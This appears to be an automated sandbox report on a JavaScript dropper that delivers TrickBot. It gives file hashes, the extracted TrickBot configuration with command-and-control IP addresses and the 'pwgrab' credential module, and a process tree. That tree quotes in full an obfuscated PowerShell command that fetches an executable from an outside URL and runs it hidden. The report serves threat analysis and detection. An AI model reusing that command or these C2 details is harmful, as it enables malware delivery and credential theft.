Analysis
-
max time kernel
33s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-01-2021 06:51
Static task
static1
Behavioral task
behavioral1
Sample
wGGlWA9kvQ.js
Resource
win7v20201028
General
-
Target
wGGlWA9kvQ.js
-
Size
30KB
-
MD5
71e84623c9f780a2ae34c49964a1d4fd
-
SHA1
8bab366961bf4363c13b169f086c959ff8515e85
-
SHA256
4bdc0f495dfb6d2425fd712ccdda2d1943c700e3b780c37c1c147462a30c9e30
-
SHA512
f4cd7ccd1bf213e3262e4268b0247466b31e3bed3b3877a54b24e58d6710b6f1e83dce581d6d88ab544382cd6559fca2955e83657fd7801d0852fd00497327eb
Malware Config
Extracted
http://dralex.smartwebsitedesign.com/local.php
Extracted
trickbot
100010
rob35
5.34.180.180:443
64.74.160.228:443
198.46.198.116:443
5.34.180.185:443
107.152.46.188:443
195.123.241.214:443
23.254.224.2:443
107.172.188.113:443
200.52.147.93:443
185.198.59.45:443
45.14.226.101:443
185.82.126.38:443
85.204.116.139:443
45.155.173.248:443
103.91.244.50:443
45.230.244.20:443
45.226.124.226:443
187.84.95.6:443
186.250.157.116:443
186.137.85.76:443
36.94.62.207:443
182.253.107.34:443
180.92.158.244:443
-
autorunName:pwgrab
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 2820 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
TempNeX26.exepid process 2920 TempNeX26.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2820 powershell.exe -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
wscript.execmd.exedescription pid process target process PID 744 wrote to memory of 2212 744 wscript.exe cmd.exe PID 744 wrote to memory of 2212 744 wscript.exe cmd.exe PID 2212 wrote to memory of 2820 2212 cmd.exe powershell.exe PID 2212 wrote to memory of 2820 2212 cmd.exe powershell.exe PID 2212 wrote to memory of 2920 2212 cmd.exe TempNeX26.exe PID 2212 wrote to memory of 2920 2212 cmd.exe TempNeX26.exe PID 2212 wrote to memory of 2920 2212 cmd.exe TempNeX26.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\wGGlWA9kvQ.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','%temp%NeX26.exe'); & %temp%NeX26.exe & toMsRYPvmFupWNT2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','C:\Users\Admin\AppData\Local\TempNeX26.exe');3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\TempNeX26.exeC:\Users\Admin\AppData\Local\TempNeX26.exe3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe4⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\TempNeX26.exeMD5
2377e8d85d1c3271e8eeab035f158eca
SHA125e7161fe88e96d8f2e53523e36e978ff3c13563
SHA256dcb300ddb882699c560279dfc67ddb6be50a98bf34fef9e44fd2eb55675baebd
SHA51234eccf16c4c81673a6033a4627b4606762fad74104e6cd1e9291f0ecc797a87cd14e95c3a3cdc75479f912a5167908b8365dc604bd9ef12c4aa4ff5137ce734c
-
C:\Users\Admin\AppData\Local\TempNeX26.exeMD5
2377e8d85d1c3271e8eeab035f158eca
SHA125e7161fe88e96d8f2e53523e36e978ff3c13563
SHA256dcb300ddb882699c560279dfc67ddb6be50a98bf34fef9e44fd2eb55675baebd
SHA51234eccf16c4c81673a6033a4627b4606762fad74104e6cd1e9291f0ecc797a87cd14e95c3a3cdc75479f912a5167908b8365dc604bd9ef12c4aa4ff5137ce734c
-
memory/2212-2-0x0000000000000000-mapping.dmp
-
memory/2820-3-0x0000000000000000-mapping.dmp
-
memory/2820-4-0x00007FFF6D290000-0x00007FFF6DC7C000-memory.dmpFilesize
9.9MB
-
memory/2820-5-0x00000264CF4E0000-0x00000264CF4E1000-memory.dmpFilesize
4KB
-
memory/2820-6-0x00000264E9C40000-0x00000264E9C41000-memory.dmpFilesize
4KB
-
memory/2920-7-0x0000000000000000-mapping.dmp
-
memory/3644-10-0x0000000000000000-mapping.dmp